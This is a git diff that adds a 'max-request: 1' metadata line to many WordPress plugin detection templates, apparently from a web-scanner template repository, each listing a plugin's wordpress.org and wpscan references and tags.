diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
